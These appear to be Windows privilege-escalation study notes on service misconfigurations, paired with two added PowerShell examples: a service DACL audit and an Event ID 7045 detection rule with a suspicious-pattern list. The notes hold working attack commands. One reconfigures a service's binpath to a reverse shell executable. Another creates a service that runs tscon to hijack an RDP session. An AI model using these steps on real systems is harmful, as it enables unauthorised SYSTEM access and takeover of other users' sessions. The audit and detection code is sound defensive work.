Service Commands
Query the configuration of a service:
sc.exe qc <name>
Query the current status of a service:
sc.exe query <name>
Modify a configuration option of a service (sc.exe requires a space after the equals sign):
sc.exe config <name> <option>= <value>
Start/stop a service:
net start <name>
net stop <name>
Service Misconfigurations
- Insecure Service Properties
- Unquoted Service Path
- Weak Registry Permissions
- Insecure Service Executables
- DLL Hijacking
Insecure Service Permissions
Each service has an ACL which defines certain service-specific permissions.
Some of these are dangerous (e.g. SERVICE_CHANGE_CONFIG, SERVICE_ALL_ACCESS).
If our user has permission to change the configuration of a service which runs with SYSTEM privileges, we can change the executable the service uses to one of our own.
Potential Rabbit Hole: If you can change a service configuration but cannot stop/start the service, you may not be able to escalate privileges!
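An audit of the risk described above, written here as an added example (it is not part of the original notes and does not use winPEAS or accesschk): it reads each service's security descriptor with sc.exe sdshow, decodes the SDDL with .NET's RawSecurityDescriptor, and reports any AccessAllowed ACE that grants a dangerous right to Everyone, Authenticated Users, INTERACTIVE or BUILTIN\Users. The access-mask bit values are the documented Win32 service rights; the demonstration SDDL string is constructed, not taken from a real host. The AlsoStartStop column captures the rabbit-hole note: a principal that can change the configuration and also start/stop the service is the case to fix first.

```powershell
# Added example (not part of the original notes): audit service DACLs for rights that let
# low-privilege principals reconfigure or restart a service. Reads the SDDL with
# "sc.exe sdshow" and decodes it with .NET's RawSecurityDescriptor; no third-party tools.
# Service-specific access-mask bits are the documented Win32 service rights.
$DangerousRights = [ordered]@{
    SERVICE_CHANGE_CONFIG = 0x0002      # SDDL token DC: change binPath, account, start type
    SERVICE_START         = 0x0010      # RP
    SERVICE_STOP          = 0x0020      # WP
    DELETE                = 0x10000     # SD
    WRITE_DAC             = 0x40000     # WD: rewrite the ACL itself
    WRITE_OWNER           = 0x80000     # WO
    GENERIC_WRITE         = 0x40000000  # GW
    GENERIC_ALL           = 0x10000000  # GA
}
# Well-known SIDs that every interactive or authenticated user falls under
$LowPrivSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-4'      = 'INTERACTIVE'
    'S-1-5-32-545' = 'BUILTIN\Users'
}

function Get-ServiceSddl {
    # Returns the SDDL string for one service, or $null if sc.exe cannot read it
    param([Parameter(Mandatory)][string]$Name)
    $out = & sc.exe sdshow $Name 2>$null
    if ($LASTEXITCODE -ne 0) { return $null }
    # sc.exe prints a blank line followed by the descriptor
    $line = $out | Where-Object { $_ -match 'D:\(' } | Select-Object -First 1
    if ($line) { $line.Trim() }
}

function Test-ServiceDacl {
    # Emits one finding per AccessAllowed ACE that grants a dangerous right to a low-privilege SID
    param([Parameter(Mandatory)][string]$ServiceName,
          [Parameter(Mandatory)][string]$Sddl)
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $Sddl
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
        $sid = $ace.SecurityIdentifier.Value
        if (-not $LowPrivSids.ContainsKey($sid)) { continue }
        $granted = @($DangerousRights.Keys | Where-Object { ($ace.AccessMask -band $DangerousRights[$_]) -ne 0 })
        if ($granted.Count -eq 0) { continue }
        [pscustomobject]@{
            Service       = $ServiceName
            Principal     = $LowPrivSids[$sid]
            Rights        = ($granted -join ', ')
            # Change-config plus start/stop (RP|WP = 0x30) on one ACE is the worst case: a changed
            # binPath takes effect as soon as the same principal restarts the service
            AlsoStartStop = (($ace.AccessMask -band 0x30) -eq 0x30)
        }
    }
}

function Invoke-ServiceDaclAudit {
    # Runs the check over every installed service on this host
    foreach ($svc in Get-Service) {
        $sddl = Get-ServiceSddl -Name $svc.Name
        if ($sddl) { Test-ServiceDacl -ServiceName $svc.Name -Sddl $sddl }
    }
}

# Constructed SDDL for demonstration (not from a real host): SYSTEM (SY) and Administrators (BA)
# look normal, but Authenticated Users (AU) are granted DC, RP and WP.
$weakSddl = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)'
Test-ServiceDacl -ServiceName 'daclsvc' -Sddl $weakSddl | Format-Table -AutoSize
# Uncomment to audit the live host (run elevated so every descriptor is readable):
# Invoke-ServiceDaclAudit | Format-Table -AutoSize
```

Run as written, the constructed descriptor produces one finding: Authenticated Users with SERVICE_CHANGE_CONFIG, SERVICE_START, SERVICE_STOP and AlsoStartStop set to True. Findings from the live audit are fixed by tightening the service DACL (sc.exe sdset, or the "System Services" policy in Group Policy) so that only administrators hold DC, WD and WO.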
Exploitation
Run winPEAS to check for service misconfigurations:
> .\winPEASany.exe quiet servicesinfo
We can confirm this with accesschk.exe:
.\accesschk.exe /accepteula -uwcqv user daclsvc
Check the current configuration of the service:
sc qc daclsvc
Check the current status of the service:
sc query daclsvc
Reconfigure the service to use our reverse shell executable:
sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
Start a listener on Kali, and then start the service to trigger the exploit:
net start daclsvc
Unquoted Service Permission
RDP Session Hijacking
sc create sesshijack binpath= "cmd.exe /k tscon 3 /dest:rdp-tcp#2"
net start sesshijack
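Both the daclsvc reconfiguration and the sesshijack service above leave a trace in the System event log: creating a service through the service control manager writes Event ID 7045 ("A service was installed in the system"), whose EventData carries ServiceName, ImagePath and AccountName. The following detection rule is an added example, not part of the original notes; the regular-expression list is an assumption about what a normal service image path should not contain, and the sample records are constructed, with the first one mirroring the sesshijack command above.

```powershell
# Added example (not part of the original notes): flag "new service installed" records
# (System log, Event ID 7045) whose ImagePath runs an interpreter or invokes tscon.
# Field names (ServiceName, ImagePath, AccountName) follow the 7045 EventData schema;
# the pattern list is an assumption and should be tuned per environment.
$SuspiciousPatterns = @(
    'tscon',                               # session switching driven from a service
    '\bcmd\.exe\b',                        # the "service" is really a shell one-liner
    'powershell',                          # ... or a PowerShell one-liner
    'rundll32|mshta|regsvr32',             # script/DLL hosts rarely used as service images
    '\\Users\\|\\Temp\\|\\ProgramData\\'   # binaries outside Program Files / System32
)

function Test-ServiceInstallEvent {
    # Pure rule: takes the 7045 fields and returns a verdict object
    param([string]$ServiceName = '',
          [string]$ImagePath   = '',
          [string]$AccountName = '',
          [datetime]$TimeCreated = [datetime]::MinValue)
    $matched = @($SuspiciousPatterns | Where-Object { $ImagePath -match $_ })
    [pscustomobject]@{
        TimeCreated = $TimeCreated
        ServiceName = $ServiceName
        ImagePath   = $ImagePath
        AccountName = $AccountName
        Matched     = ($matched -join '; ')
        Suspicious  = ($matched.Count -gt 0)
    }
}

function Get-SuspiciousServiceInstalls {
    # Reads the live System log and applies the rule to each 7045 record
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $evt = $_
            $xml = [xml]$evt.ToXml()
            $f = @{}
            foreach ($d in $xml.Event.EventData.Data) { $f[$d.Name] = $d.'#text' }
            Test-ServiceInstallEvent -ServiceName $f['ServiceName'] -ImagePath $f['ImagePath'] `
                                     -AccountName $f['AccountName'] -TimeCreated $evt.TimeCreated
        } |
        Where-Object Suspicious
}

# Constructed sample records (not real log data); the first mirrors the sesshijack service above
$samples = @(
    @{ ServiceName = 'sesshijack'; ImagePath = 'cmd.exe /k tscon 3 /dest:rdp-tcp#2'; AccountName = 'LocalSystem' },
    @{ ServiceName = 'Spooler';    ImagePath = 'C:\Windows\System32\spoolsv.exe';    AccountName = 'LocalSystem' }
)
$samples | ForEach-Object { $s = $_; Test-ServiceInstallEvent @s } | Format-Table -AutoSize
# Uncomment to scan the live host:
# Get-SuspiciousServiceInstalls | Format-Table -AutoSize
```

On the constructed samples the sesshijack record is flagged on two patterns (tscon and cmd.exe) while the Spooler record is not. Because 7045 is written by the service control manager regardless of how the service was created, the rule also catches services installed with sc.exe create from a remote session; forwarding the System log to a central collector is what makes it useful beyond the single host.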